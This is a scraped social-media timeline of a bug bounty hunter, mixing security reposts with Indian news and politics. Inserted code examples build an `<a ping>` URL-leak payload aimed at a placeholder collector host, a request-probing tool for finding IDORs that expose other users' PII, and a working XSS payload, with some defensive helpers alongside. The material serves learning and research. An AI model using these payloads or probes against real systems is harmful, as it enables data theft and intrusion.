0xViem
@vm_sachin
1.8K posts

🐞Bounty Hunter
Bharat · Joined May 2015
199 Following · 535 Followers

hashkitten @hash_kitten
Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is Chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only! xss.hashkitten.io/xss1.html

0xViem @vm_sachin
@_jensec Wtf did I just see 💀💀

0xViem reposted
Nowasky @nowaskyjr
Anchor/area tags can leak page URLs (origin, path, query, post-click fragment) by using href="#" with the ping attribute pointing elsewhere. Works in Chrome and Safari (Firefox disables ping by default). storage.googleapis.com/nowaskyjr/ping…
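Added example, not Nowasky's code or the linked write-up: when an `<a ping>` link is clicked the browser POSTs "PING" to each ping URL with a `Ping-To` header holding the link's resolved href. Since `href="#"` resolves against the current document, `Ping-To` becomes the page's own URL, which is what the post describes. The hostnames `victim.example` and `collector.example` are placeholders chosen here, and the regex sanitizer is a self-contained stand-in for a DOM-based one.

```javascript
// Added example (not Nowasky's code). Hostnames are placeholders.
//
// Ping-To carries the resolved href; it is set on every ping request,
// whatever the destination origin. Ping-From (the document URL) is only
// added in some origin/scheme combinations, so the trick is to make the
// href itself equal the page URL: href="#" does exactly that.

// Value the browser sends in Ping-To for a given document URL and href.
function pingToHeader(documentUrl, href) {
  return new URL(href, documentUrl).href;
}

// What an attacker with HTML injection plants: the link looks harmless.
function pingPayload(collectorUrl) {
  return `<a href="#" ping="${collectorUrl}">next</a>`;
}

// Defender side: drop ping attributes from <a>/<area> in untrusted HTML.
// Regex-based so the demo runs stand-alone; in production use a DOM-based
// allowlist sanitizer, which drops ping simply by not allowlisting it.
function stripPing(html) {
  return html.replace(/<(?:a|area)\b[^>]*>/gi, (tag) =>
    tag.replace(/\sping\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)/gi, "")
  );
}

// Review helper: list ping targets that point off-origin. The attribute is
// a space-separated list of URLs, so split it before resolving.
function crossOriginPings(html, documentUrl) {
  const origin = new URL(documentUrl).origin;
  const found = [];
  for (const m of html.matchAll(/\sping\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi)) {
    for (const p of (m[1] ?? m[2] ?? m[3]).split(/\s+/)) {
      if (p && new URL(p, documentUrl).origin !== origin) found.push(p);
    }
  }
  return found;
}

// Constructed sample: a page whose query string holds a secret.
const page = "https://victim.example/account/settings?invite=abc123#profile";
console.log(pingToHeader(page, "#"));   // origin + path + query leak; fragment is reset to empty
console.log(crossOriginPings(pingPayload("https://collector.example/log"), page));
console.log(stripPing(pingPayload("https://collector.example/log")));
```

Note that `pingToHeader(page, "#")` keeps the query string but drops the original fragment, which matches the post's wording: only the fragment present after the click is sent.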

0xViem reposted
Defence Minister's Office / RMO India
Operation Sindoor took place just recently. Our forces destroyed Pakistan-based terrorist camps. Although we had given a very measured response and our reply was not escalatory, Pakistan's attitude did not let the situation on the border remain normal after Operation Sindoor. During this period, the way mock drills were held across the country, and the way our administrative officers successfully explained and conveyed that mock drill to the public, is a brilliant example of all of you being public servants. All of you, too, must keep yourselves mentally prepared for any such situation that may arise in the future: Defence Minister Shri @rajnathsingh

0xViem reposted
Harsh Jaiswal @rootxharsh
With only 48 hours remaining in a bug bounty event, I used @HacktronAI CLI to perform large-scale analysis of several JDBC drivers. Netting $85,000 in total rewards. This write-up shows how AI-assisted vulnerability research is speeding up the work of researchers and leading to high-impact findings. Read here - hacktron.ai/blog/jdbc-audi…

0xViem reposted
the_IDORminator @the_IDORminator
Let's do interactive #bugbounty learning. Path-based IDORs. Fun!

You visit a webpage with your browser, which should be Firefox, at https://www[.]place[.]com/user/12345. The webpage forces a client request to https://api[.]place[.]com/api/v3/users/12345. This request responds with JSON about that user, to populate into your Firefox web browser. It's sensitive PII. Let me break down my thought process here.

1] The first thing I do with this, in less than 5 seconds, is try the number 12344 in the path. Iterate a bit, make sure you get 401/403s back. If not, you are probably looking at someone else's PII. Yay, GG.
2] I try to change the path to /v1/, /v2/, /v4/. Remove it entirely too. Sometimes different API versions are less secure: those still in development, older ones, etc.
3] Then I run parameters at the end like ../api/v3/users/12345?userId=12344. I try every parameter from the JSON response(s). Did the response change? If it changed, the parameter did something. Investigate. (Intruder here.)
4] I search JS files for "/api/v3/users" or keywords in the path to find where and how the API path was built, or where there may be other API paths. This is usually in the JS. Sometimes there are deprecated, hidden, or admin APIs lying there. Then I try all of those. Pivot, pivot, pivot.
5] I usually try appending ?, /, #, and/or URL-encoded versions of each of these to the end of the API path. Sometimes that results in a bypass. One time I bypassed the security on thousands of APIs using a trailing slash due to ... well... bad code. This trick also works well when the mitigation was a WAF block.
6] Traverse backwards down the API. Check /api/v3/users/, /api/v3/, /api/; fuzz for obvious Swagger or API schema paths. Add extra slashes, it looks cool: ///api//v3//users/////. Who knows, right?
7] Throw a single quote in there, /12345'. Did it blow up? Add another quote in there, /12345''. Did it un-blow up? Might be SQLi. Don't try XSS, XSS is stupid.
8] Fuzz the word "users". What else could be there?
9] Sometimes APIs reserve keywords, like "ALL". Try things like /users/all instead of /users/12345. Run the US Webster's Dictionary through that path. Watch case sensitivity: if it uses lower, it's probably always lower. So don't send uppercase stuff to a lowercase API.
10] If none of this worked, I'm probably on another API at this point. Less than 10 minutes gone. What else would you do?
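Added example, not the_IDORminator's code: the path-mutation steps above (1, 2, 3, 5, 6, 7 and 9) turned into a probe-URL generator, plus the 401/403 check from step 1 as a loop with an injectable `fetch`. Steps 4 and 8 (grepping JS, fuzzing the resource word) need a wordlist or source and are left to the operator. `api.place.com` is the post's own placeholder host; the field names are assumed to come from the JSON response you observed.

```javascript
// Added example (not the_IDORminator's code). Host and field names are placeholders.

const OTHER_VERSIONS = ["v1", "v2", "v4"];              // step 2
const TRAILERS = ["?", "/", "#", "%3f", "%2f", "%23"];  // step 5
const RESERVED = ["all", "me", "list"];                 // step 9: seed list, extend with a wordlist

// Build every probe URL the checklist calls for from one observed API URL.
function probeUrls(apiUrl, { fields = [], altId } = {}) {
  const u = new URL(apiUrl);
  const segs = u.pathname.split("/").filter(Boolean);   // ["api","v3","users","12345"]
  const last = segs.length - 1;
  const id = segs[last];
  const isNumeric = /^\d+$/.test(id);
  const other = altId ?? (isNumeric ? String(Number(id) - 1) : id);
  const out = new Set();
  const join = (parts) => "/" + parts.join("/");
  const add = (path, query = "") => out.add(u.origin + path + query);
  const withLast = (v) => join([...segs.slice(0, last), v]);

  // 1] neighbouring ids in the path
  if (isNumeric) for (const d of [-1, 1]) add(withLast(String(Number(id) + d)));

  // 2] other API versions, and no version segment at all
  const vi = segs.findIndex((s) => /^v\d+$/i.test(s));
  if (vi !== -1) {
    for (const v of OTHER_VERSIONS) { const c = [...segs]; c[vi] = v; add(join(c)); }
    add(join(segs.filter((_, i) => i !== vi)));
  }

  // 3] query overrides named after fields seen in the JSON response
  for (const f of fields) add(join(segs), `?${encodeURIComponent(f)}=${encodeURIComponent(other)}`);

  // 5] trailing characters and their URL-encoded forms
  for (const t of TRAILERS) add(join(segs) + t);

  // 6] walk back up the path, then the extra-slash variant
  for (let k = last; k >= 1; k--) add(join(segs.slice(0, k)) + "/");
  add("///" + segs.join("//") + "/////");

  // 7] one quote, then two, on the id
  add(join(segs) + "'");
  add(join(segs) + "''");

  // 9] reserved words in place of the id, lower-case like the rest of the path
  for (const w of RESERVED) add(withLast(w));

  return [...out];
}

// Step 1's check: 401/403 means the object is protected and 404 means it
// does not exist; anything else (200, 500, a redirect) is worth a look.
// fetchImpl is injectable so the loop can be dry-run against a stub.
async function runProbes(urls, fetchImpl = globalThis.fetch) {
  const hits = [];
  for (const url of urls) {
    const res = await fetchImpl(url, { redirect: "manual" });
    if (![401, 403, 404].includes(res.status)) hits.push({ url, status: res.status });
  }
  return hits;
}

const probes = probeUrls("https://api.place.com/api/v3/users/12345", {
  fields: ["userId", "email"],   // assumed: keys seen in the JSON response
  altId: "12344",
});
console.log(probes.join("\n"));
```

Feed `probes` to `runProbes` with your authenticated `fetch` (cookies or bearer token set) and compare any hit's body against your own record; a different user's PII at a 200 is the finding, a 200 with your own data on `?userId=` means the parameter is ignored.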

0xViem reposted
Tushar Gupta @Tushar15
People born post-2000 have a lot of questions about what happened in Delhi. Most of them were not even in their teens in 2014, and do not know about these traumatic years. Never forget.

0xViem reposted
NTV Breaking News @NTVJustIn
Key information from the terrorist Dr. Moinuddin arrested in Hyderabad. Gujarat ATS arrested Moinuddin in Rajendranagar. A conspiracy to kill by poisoning on a massive scale. Syed Moinuddin was manufacturing ricin poison. A conspiracy to carry out mass poisoning by mixing ricin into temples and water tanks. Gujarat ATS has already arrested four people along with Syed. #Hyderabad #Gujarat #GujaratPolice

0xViem reposted
Yew's Finest @FinestYew
Let us grieve, let us mourn, let us indulge a moment's weakness. There will be time aplenty for retribution at the crack of dawn.

Behi @Behi_Sec
This XSS payload by @garethheyes is brilliant: <svg onload="attributes[0].value=id+URL+id,new onload" id=`> It requires this hash: #${alert(1)}
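Added example, not @garethheyes's or Behi's code: a Node-side model of why the payload fires. Inside the inline handler, `id` is the element's id attribute (a single backtick) and `URL` is `document.URL`, so `id+URL+id` wraps the page URL, hash included, in backticks; writing that string back into the `onload` attribute recompiles the handler as a template literal and `new onload` runs it, evaluating the `${alert(1)}` carried in the hash. The page URL below is a placeholder, and a recording `alert` stands in for the real one.

```javascript
// Added example (not the payload author's code). URL is a placeholder.

const PAYLOAD = '<svg onload="attributes[0].value=id+URL+id,new onload" id=`>';

// What `id+URL+id` evaluates to inside the handler: the element's id ("`")
// on both sides of document.URL.
function handlerSource(documentUrl, elementId = "`") {
  return elementId + documentUrl + elementId;
}

// Stand-in for the browser recompiling the onload attribute and `new onload`
// invoking it: the attribute text becomes a function body whose only
// statement is the template literal. alert is injected so calls are recorded.
function fireHandler(source) {
  const calls = [];
  const alert = (x) => { calls.push(x); };
  new Function("alert", source)(alert);
  return calls;
}

// Detection hint for the same shape: a handler body that is one backtick
// string containing ${...}. Browsers leave $ { } ( ) unencoded in the
// fragment, which is why the hash can carry code; "#%24%7B..." would be
// plain text inside the literal.
function isTemplateLiteralHandler(source) {
  return /^`[\s\S]*\$\{[\s\S]*\}[\s\S]*`$/.test(source);
}

const src = handlerSource("https://example.test/page#${alert(1)}");
console.log(PAYLOAD);
console.log(src);                          // `https://example.test/page#${alert(1)}`
console.log(fireHandler(src));             // [ 1 ]
console.log(isTemplateLiteralHandler(src));
```

The same page URL without the crafted hash (say `#top`) still recompiles the handler, but the resulting literal contains no `${...}`, so nothing executes; the hash is the only attacker-controlled part of the source.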

0xViem reposted
Raluca Ada Popa @ralucaadapopa
I am proud to share the announcement about our CodeMender project at @GoogleDeepMind, an agent that can automatically fix a range of code security vulnerabilities. From only a modest-compute run, our agent submitted 72 high-quality fixes to vulnerable code in popular codebases, and maintainers accepted and upstreamed them. deepmind.google/discover/blog/…

0xViem reposted
James Kettle @albinowax
The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: http1mustdie.com

Patrik Grobshäuser @ITSecurityguard
We all know who the real #1 US Hacker on HackerOne is 👇

Immunefi @immunefi
Statement:
A. Spectra Finance contracted with Immunefi to run an Audit Competition. Per our process, Immunefi provided Spectra the program draft that included the reward structure and linked to our standard competition reward terms. The Spectra team, including their CEO, conducted multiple reviews over 3+ weeks and approved the program draft that clearly stated that a single bug finding unlocks the full $40K pool. Not a single time during program drafting, marketing or during the 1.5 month hunting and evaluation period did they bring up an issue with this reward mechanic. Only when it was time to pay the community did they claim there was a disconnect in expectations.
B. The program received 331 reports from 103 SRs of which 27 were confirmed reports excluding insight reports.
C. After several weeks of good faith engagement to resolve the matter with Spectra including offering to contribute Immunefi program fees to bridge the gap and cover the full $40k payout, the matter remains unresolved. Spectra has not honored its commitment per the program rules they approved for publishing on Immunefi.
D. We have designed our platform rules to protect the balance of interests and hold them at the highest tier of priority to protect against bad faith actions from either party.
E. In this case, given the >1 month delay in payment to SRs, we have decided to make SRs whole using Immunefi's own funds, rather than accept the unreasonably low and unfair offer made by Spectra. Their offer to pay per bug finding is precisely what a Bug Bounty program is - NOT an audit competition.
F. It would have been easier for us to either shortchange SRs or quietly fill the gap in payments from Spectra but we instead chose transparency and solving the problem for SRs. Given the recent undercurrent of opacity on such issues in the web3 sec space, we decided to take the lead in defining the way forward - even if it means taking a financial hit for it.
G. We would like to highlight here that this is the first case of such abuse by a project in our history of running 43 competition programs.
H. To protect SRs and the platform from such abuse in the future, we will be updating our policy on pre-payment of the reward in due course.

Quoting Spectra @spectra_finance: Public Statement on the Immunefi Audit Contest Dispute